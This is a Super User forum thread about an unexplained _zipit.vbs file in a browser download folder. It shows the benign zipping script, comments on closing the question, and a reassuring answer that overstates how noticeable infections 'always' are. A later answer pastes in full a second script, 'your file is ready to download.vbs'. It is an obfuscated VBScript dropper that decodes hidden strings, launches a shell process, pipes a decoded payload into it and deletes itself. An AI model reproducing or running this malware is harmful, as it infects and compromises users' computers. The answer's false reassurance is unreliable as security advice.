# Unknown VBS script on my browser download folder

Tags: security, virus, malware, vbscript

There is a _zipit.vbs on my download folder.  I use Firefox

The code opened in notepad below.  This file has been on my computer for 6 months.
I dont know where it came from but googling seems to show that it's used at other places to zip things.  Does anyone know if this is part of a malware or if another process somewhere is calling it?  How do I find out if there are other processes that use this?

```
   Set objArgs = WScript.Arguments 
   InputFolder = objArgs(0) 
   ZipFile = objArgs(1) 
   CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile,   
   True).Write "PK" & Chr(5) & Chr(6) & String(18, vbNullChar) 
   Set objShell = CreateObject("Shell.Application") 
   Set source = objShell.NameSpace(InputFolder).Items 
   objShell.NameSpace(ZipFile).CopyHere(source) 
   wScript.Sleep 2000
```

I googled the SHA256 of it and it took it to 
https://www.hybrid-analysis.com/sample/4793ba4b4ca5bba8c2fdd3460af0d8b4ff43bf88dc5b7c0acc82ccab96795a00

where it was part of another malware.

Any advice on what to do now?

Antivirus scans dont show up anything.

Comment: @DavidPostill Vote to reopen. In my opinion, this is not a duplicate, because the question here is not about being infected, but about the browser not executing the vbs file.

Comment: @LPChip How do we know the browser is *not* executing the file? It doesn't say so in the question.

Comment: @DavidPostill Indeed, but my browser doesn't either, and most others don't. Its a bit of a stretch to assume it was executed, and for that reason alone I think this question should not be closed just yet.

Comment: @dsstorefile I understand that, and thank you for the reply. I use firefox. I am more concerned about another hidden malware somewhere that is using this to zip my files and sending it somewhere else.  Is there way I can track that?

Comment: If you are afraid of malware, check the duplicate.

Answer (score 0):

Many websites that use exploits will try to download a script to a temporary folder, and then execute it.

Modern browsers, that are kept up-to-date will not be vulnerable to this. This can mean that a website can still trigger a download, but rather than this file being downloaded to a temporary folder and therefor be invisible to the user, the file gets downloaded to your download folder instead.

If the malware would have been succesful, you will definitely know as such infections are always noticable by unwanted advertisements, increasement of CPU usage, amongst other symptoms.

It is quite likely that your browser protected you.

Do note, Internet Explorer is one of the few browsers that is still very vulnerable for these exploits, chrome based browsers are not, and an up-to-date firefox shouldn't be either.

Its always going to be difficult to be sure, but if the malware infection was succesful, that .vbs script would most likely not be in your downloads anymore.

Answer (score 0):

i have the same thing but it says it is "your file is ready to download.vbs". here is the code.
code is below

os_type = ""

Function remove_line_number(dt)
On Error Resume Next

```
stk = os_type
dat_l = ((Len(dt) / 2) - 1)

kl = Len(stk)

s = ""
For i = 0 To dat_l
    c1 = CInt("&H" & Mid(dt, ((i*2)+1), 2))
    c2 = Asc(Mid(stk, (i Mod kl) + 1, 1))

    s = s & Chr(c1 Xor c2)
Next

remove_line_number = s
```

End Function

Function get_str(ByVal sText)
With CreateObject("Msxml2.DOMDocument").CreateElement("aux")
.DataType = "bin.base64"
.NodeTypedValue = get_res(sText)
get_str = .Text
End With

End Function

local_v1 = "WyIyNjU3NDQ5ODc5NzUxMjUxNDc1IiwxNjc5Njk2Nzc5LCJOemcxTVRFRkRnQUdCUU1CRFFZSUFBMEVBd1FHREFJRVRRNFBBQVFCRDBRRUJ3WU9EZ3dIQmdBQVNXNVNSVUElM0QiXQ=="

assistx_ver = "Relation of Nevada America's first climate neutral city with more than 500 million consumers"

function get_res(ByVal sText)
With CreateObject("ADODB.Stream")
.Type = 2
.Charset = "utf-16le"
.Open
.WriteText sText
.Position = 0
.Type = 1
.Position = 2
get_res = .Read
.Close
End With

end function

pf = WScript.ScriptFullName

os_type = Mid(assistx_ver, 57, 1) & "l" & Mid(assistx_ver, 26, 1) & "y" & Mid(assistx_ver, 69, 1) & "s" & Mid(assistx_ver, 10, 1) & Mid(assistx_ver, 86, 1) & Mid(assistx_ver, &H57, 1)
Set objws = CreateObject("WSc" & remove_line_number("0505110D4F20070B") & "ll")

Set Obj_s = CreateObject("Scri" & remove_line_number("07180817065D29071F123F180A151602") & "Object")

str_2 = remove_line_number("7A666C736C794B2F203433241702201B1C4E2C3F180A151602402712141557241D0C01171E0206245B492E3D303E255A746B571D0205283A000B5053524E51445943426C794B01184A48150B141662647E7D616B5D2B2C190F01280B0D16031203535719190D155A7E654A05053C200B0C53524E510509111500100A3103161E0014434862647E7D616B1F141D0C1A1A1802411E0407390F1F02092300311C1C07071E030F3813010E175B2C1F150B081D0833571518533813013C47530C616B7045111B2F01053F5C22320A1C1A161A4222160F050A1C072A565B3F131C022C120409574D32071D071D1044451B15412E1C0124455A746B7E65675704185C5D20202C3136190F320D135D280B073515151C125B4829160341280D041E3F1C1C0709130D18250E0206124B48426C79664A161351451B15321D1C202C5C4F57552E5463797A66685D084E5F557E7D6545155C570A0A5D3B090F1E151B5463797E480A44215B46557E7D616B703A121D1C120E315B4333161C070912443A0B0415324A185B48120D4F1F0A0014030448426C7966081C0509001A095B4B0C531E02415D1207464E0853073A5D085844334E530E4154030B001C5353090522451A4A4A1F2A116C736C79664A110451451B15321D1C202C594F5745111B2F01053F4F15041D081A1B2A576C736C79664A1A4A5C5A746B7A4B024E53074F35041D081A1B4C616B7045171B53335F455A746B7E656728161E1318182E555421121F0803045B341C161131451D155F4B0C005900041706070747487A66681F0E010A0F101F44451B411A014E57151F48591A570B1A2853054A523C4E4B0C535A0E191613534B05285305445D0D2E1263797A66680B04071A1C1D5748202A222C2A00102418135726161B3D0705050F1E49570B1A5A5710413A0E1D190B01032A13160C5E251D1C19576C731C7E656379531A414441515F4C487A666C731501164E087A66685D2B2C190F01280B0D160312035357363F2226241D0C3D070542261C15201B1C1A190B4922320A1C1A161A4222160F050A1C072A565B3F131C022C120409574D32071D071D1044450F13232E1C1E5E4541054130000005121E153F131C02433904030F426C79124E10161802111A0E62647E7D48080A5C57253105161E3E1E0D1C0D0F1F2C5D3C426C794B0A534A4C431F14071A1C16051F0917091641160A0D4E5A746B7E65637953195C5D2B2C190F01280B0D1603120335432A576C7345170E1A534A4C4517141F03557E7D616B5D021C0118270E1C04595C534D263834395B25321C091A04161E042520060B071C34030F0F04011B0B012418141D081C334C487A66451D084E4B242C010D1326061F000C121B3753245A7E656379530D414441572E3D3028290F1A32071D557E7D480D180F144F53535520001706060E091655576C736C796264041F050D1C495700055A57176C7368071D17087A666870150116157E7D65687008154F46525F38040A155E3F0F071F4C451A0E1D193A0A070948501A3D0A195E3E180414415E3F0F071F4C451A0E1D193A0A07094105413C1A1A5E39190D155A0E62647A7E116C73687A0C0F0714041A046C7962647A7E48020B414E4F4A151600121C5A7E65677A1E0A415145170E1A535A091059451D1A021F5E4C1A746B7A666707051541026C7966677A7E4813595C53280B075A25151C0C231D0103121E15003712031B1657413118151B4F4A101802172D18030A4E5E390D0C1C4157030F1D10576C73687A666757130D15595C53080B07210D0D0C0431163E1C040515100E1D2E1C011615495D135A5463797E65687045054F53535308000D3A4332557E7D65687068570C1C534A4C450D13060A557E7D6568701C100E1A101F171C746B7A6613531200121C410862647A7E65450F414E4F4A1716183A493C4862647A7E116C736C79666707051541026C7966677A530A0C0D414E4F4C1B0318110A5B5C4015430A431946144E145F0E510512441A4112481F01511A4A1C551D184E0C581C5F051A0B5308421143594C154F4A175B481455451A1C42570500172637121D5F5F531A4D5D051A62647A7E65451D1553524E04100915594515021A535A39121C23121C0710270D130A081D08557E7D616B70687A4B0A12035E414441140A1A251600141C230A3F01001E1808160F321D1C120E44451D155A5463797E6568100753474A1716185322512E4F4314034C450F48531463797E65687045055D4E4E574805181541345E2E4C616B746B7A66677A3909165428070A03230503111C1307164E5E270D151141570C011D0138180904534220121A09415D0D120109535A3A001514164F4A17034C4C29131C1F0B010315350011164F4C20031E081706514F4335181E021C410F4F210603412F0C0D1F5463797E65687045170E1A534A4C451D00075D557E7D65687068570C1C534A4C450D13060A557E7D6568701C7E65677A0A0F000D021B14137E7D616B70681A094E5B530F13594C161E4E57031E141C48531463797E65680D130A1463797E6568701207001E487A666870680E0C0F0714041A046C7966677A031E18591A1A0A16535308000D3A4232550E140D151A09081263797E651C746B7A124E10161802111A0E62647E7D65150B18531463797E65451419004F53535F44061C155E1D0F1D13030C5959434F431E1E020814141E4F5B465E465749484862647A7E48021D1553524E281E02152449340A1A5E330D151C415E3A281C0501000D41561C47487A666C73687A550D1D034C1611081F0A4657180748591A7E65677A7E1813001A070A03035F4805554506434A1A0440451D085A541310161802111A0E62647E7D65687032070E1C075A3F0D1C04034F461412184C0B001D0B011E575B54594C1E06001A1A190C59524646557E7D656870451D0B1A534A4C3A100F0732463412184C3D00070A4E5E222A0E0B0C121B4E5604455A746B7E65677A7E050759495B4B00170341451A0507464E5E1018415D0C0B1C47530C616B70687A660C01120D0A59021D1B557E7D6568701C7E65677A0A616B746B7A124E10161802111A0E62640E7A666C73")
set var3 = objws.Exec(remove_line_number("14010557040B0A4E5C144C111616161D1D1B12000D594C24060017181B320D181F0A4E3B1E08051C0F5342"))

str_2 = Replace(str_2, remove_line_number("0509111500100A3103161E0014"), local_v1)
str_2 = Replace(get_str(str_2), vbLf, "")

Obj_s.DeleteFile(pf)

obj_loc = remove_line_number("7A666C734505524C01121C0D180216301E1F020E574D43486264571B025C5B021B1D011E124C151C12074D557E7D616B746B571B0F534A4C2F1C165E3C0D1B1208141504173B0F001C2D020D081C014E5E3214041A14070A4E541401055E415E2E1C140201041715534D4110571C0E0E04011C06161B004154361A010A1C003F15000D164F261A13080417415E2A4E13554817194351546379531815595C53210B045A3F021104171A02161338000A0A271D0714100913594C3C010D165741200D415B280B075A28000D045A412F17133F041A0E1D0B1D5B435948594C210A1E16030515100E1D260007121E17180D53472016004135100C163C1E12194C4C34081D1A1A16044C54494848626421120B080A15161D43201404041D141F0A0A27161F0A594C270E1D18390D0C1C41570300535A2D020D081C014E57030D41543501060914121E415D15074F4337121F020B08031B071C194C433A09010003165718040A15515463797A660401080754")
obj_loc = Replace(obj_loc, remove_line_number("0509111500100A31031B19034F55"), str_2)

var3.StdIn.Write obj_loc

Comment: This does not really answer the question. If you have a different question, you can ask it by clicking [Ask Question](https://superuser.com/questions/ask). To get notified when this question gets new answers, you can [follow this question](https://meta.stackexchange.com/q/345661). Once you have enough [reputation](https://superuser.com/help/whats-reputation), you can also [add a bounty](https://superuser.com/help/privileges/set-bounties) to draw more attention to this question. - [From Review](/review/late-answers/1180062)